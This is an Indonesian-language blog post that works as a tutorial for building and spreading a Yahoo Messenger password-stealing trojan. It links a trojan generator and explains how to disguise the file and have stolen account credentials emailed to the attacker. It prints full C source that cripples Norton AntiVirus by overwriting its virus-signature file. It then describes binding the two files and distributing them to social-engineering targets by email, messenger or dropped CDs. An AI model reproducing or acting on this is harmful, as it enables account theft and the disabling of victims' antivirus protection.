Anda mungkin sudah tak asing lagi dengan account yahoo,,,Trojan ini memang diciptakan dan selalu dikembangkan sesuai dengan perkembangan versi Yahoo Messenger. Trojannya kita buat dengan trojan generator kemudian kita binding (ikat) dengan aplikasi pem-binding. Nanti hasil dari pembindingannya kita sebar di beberapa tempat, bisa melalui email, kirim langsung melalui YM atau dengan cara membuang CD ditempat tertentu.
Apa saja yang dibutuhkan??
1. Magic-PS Trojan Generator. Bisa Anda download disini:http://www.ziddu.com/download/3079190/Magic-PS-15se.zip.html
2. File binder(compresser)
3. C Compiler
Target??
1. Pengguna windows
2. User yang masih bisa kena sicial engineering
Proses pembuatan??
1. Matikan semua antivirus yang berada di dalam kompie anda.
2. Buat semua folder untuk menyimpan trojan
3. Copy Magic-PS-15se++ ke dalam folder yang Anda buat, dan eksekusilah trojan generator tersebut.
tampilan seperti ini:
Keterangan Trojan :
1. Victim, pada bagian ini Anda bisa memberikan tugas tambahan pada trojan yang Anda inginkan, misalkan saja mengambil IP Address si target.
2. File After Install, jika trojan ini dieksekusi maka trojan tersebut akan melakukan penyamaran diri berupa file 'regsvr.exe'. Anda bisa memilih file penyamaran lainnya.
3. Y! ID, isi bagian ini dengan account Yahoo milik Anda. Ingat! Account ID milik Anda juga harus Yahoo! dan proses pengisian pada bagian tersebut tidak disertai "@yahoo.com". Jadi cukup mengisi ID saja. Trojan akan mencuri account + password si target kemudian secara otomatis trojan akan mengirim account tersebut ke email Anda (alamat email yang Anda set di trojan loh...)
4. Choose icon, silahkan Anda memilih icon penyamaran trojan.
5. FileName, ini merupakan file trojan hasil generator. File inilah yang nantinya Anda kirim ke target yang menjadi sasaran kita
6. Create MPS merupakan tombol yang men-generate trojan.
Buat pembunuh NAV
Bye bye NAV. Nah, ini adalah routine yang bisa Anda gunakan untuk membunuh NAV secara paksa.
//--- code ----//
/*
Kill Norton AntiVirus (All versions). Local Exploit.
Norton AV can not protect this file : VIRSCAN1.DAT
and can not Detect any virus after modify this file !
(editor: jadi ceritanye nih, file .DAT nya dioverwrite ama data sampah)
*/
#include
int main()
{
HWND Lpbuff;
HKEY handle;
DWORD temp,size;
char buff[255],fName[255],dirName[255];
temp=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",0,KEY_READ,&handle);
if(temp!=ERROR_SUCCESS)
return 1;
size=sizeof(buff);
temp=RegQueryValueEx(handle,"CommonFilesDir",0,&temp,buff,&size);
if(temp!=ERROR_SUCCESS)
return 1;
RegCloseKey(handle);
strcat(buff,"\\Symantec Shared\\virusdefs\\");
strcpy(fName,buff);
strcat(buff,"definfo.dat");
SetFileAttributes(buff,FILE_ATTRIBUTE_ARCHIVE);
GetPrivateProfileString("DefDates","CurDefs","",dirName,sizeof(dirName),buff);
if(!strcmp(dirName,""))
return 1;
strcat(fName,dirName);
strcat(fName,"\\VIRSCAN1.DAT");
SetFileAttributes(fName,FILE_ATTRIBUTE_ARCHIVE);
handle=CreateFile(fName,GENERIC_WRITE,FILE_SHARE_READ,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(handle==INVALID_HANDLE_VALUE)
return 1;
size=GetFileSize(handle,&temp)-32;
Lpbuff=GlobalAlloc(GMEM_FIXED,size);
if(!Lpbuff)
{
CloseHandle(handle);
return 1;
}
FillMemory(Lpbuff,size,0x90);
SetFilePointer(handle,32,0,FILE_BEGIN);
WriteFile(handle,Lpbuff,size,&temp,NULL);
CloseHandle(handle);
return 0;
}
* Silahkan Anda Compile source code tersebut menjadi sebuah file eksekusi.
//--- code ----//
Penyerangan
Anggap saja dari beberapa proses tersebut diatas kita sudah mememiliki 2 (dua) file yaitu :
- sender.exe ----> trojan
- killanvir.exe ----> pembunuh NAV.
Kini saatnya Anda melakukan proses Binder terhadap keduanya. Yang terpenting pada proses Binder file yang bekerja pertama adalah killanvir.exe.
Hal ini dilakukan agar sebelum trojannya jalan, NAV sudah terbunuh lebih dulu. Setelah proses binding selesai kini saatnya Anda menyebarkan file tersebut ke target yang dituju.
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar